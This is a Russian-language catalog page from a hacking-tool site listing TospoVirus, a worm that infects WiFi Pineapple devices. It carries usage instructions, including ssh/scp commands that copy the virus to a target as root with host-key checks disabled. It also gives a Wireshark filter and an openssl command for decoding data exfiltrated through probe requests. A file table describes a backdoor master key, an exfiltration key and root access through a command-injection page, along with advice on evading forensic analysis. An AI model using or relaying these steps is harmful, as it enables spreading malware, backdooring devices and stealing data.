Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
TospoVirus — A WiFi Pineapple infecting worm. | Kitploit
Инструменты/GitHubGitHub/catatonicprime/tospovirus
Механизмы персистентностиЭксплуатацияЛатеральное перемещениеЭксфильтрация данныхПост-эксплуатацияБезопасность беспроводных сетейКомандование и УправлениеТроян Удаленного Доступа
GitHubcatatonicprime/tospovirus

TospoVirus

A WiFi Pineapple infecting worm.

Репозиторий
174811 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сборка TospoVirus для распространения:

./build.sh

Распространение на рабочий pineapple с версией 2.3:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Примечание: вам понадобится настроенное устройство ИЛИ используйте metasploit-module для включения ssh

Расшифровка эксфильтрованных данных:

фильтр wireshark:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

Опционально можно использовать скрипт harvest.py следующим образом:
python harvest.py [monitor-iface]

Файлы и назначение:

Скачать инструмент
ФайлНазначение
tvСам вирус.
tvbd«Главный» бэкдор-ключ, не распространяйте приватный ключ.
tvdКлюч раскрытия, используемый для эксфильтрации данных через probe-запросы.
tospo_rsaПриватный ключ идентичности, уникальный для каждого заражённого устройства, используемый в качестве ключа передачи.
tospo_rsa.pubПубличный ключ идентичности, передаваемый через страницу инъекции команд, чтобы приватная идентичность могла выполнять действия от имени root на удалённом устройстве.
wПереданные параметры беспроводной конфигурации, используемые для восстановления предыдущих подключений.
nПереданные параметры сетевой конфигурации, используемые для восстановления предыдущих подключений.
Примечание: Все файлы, начинающиеся с «tv», передаются при заражении нового устройства. Не добавляйте приватные ключи и тому подобное с именами, начинающимися с «tv», иначе ваш приватный ключ будет раскрыт при криминалистическом анализе.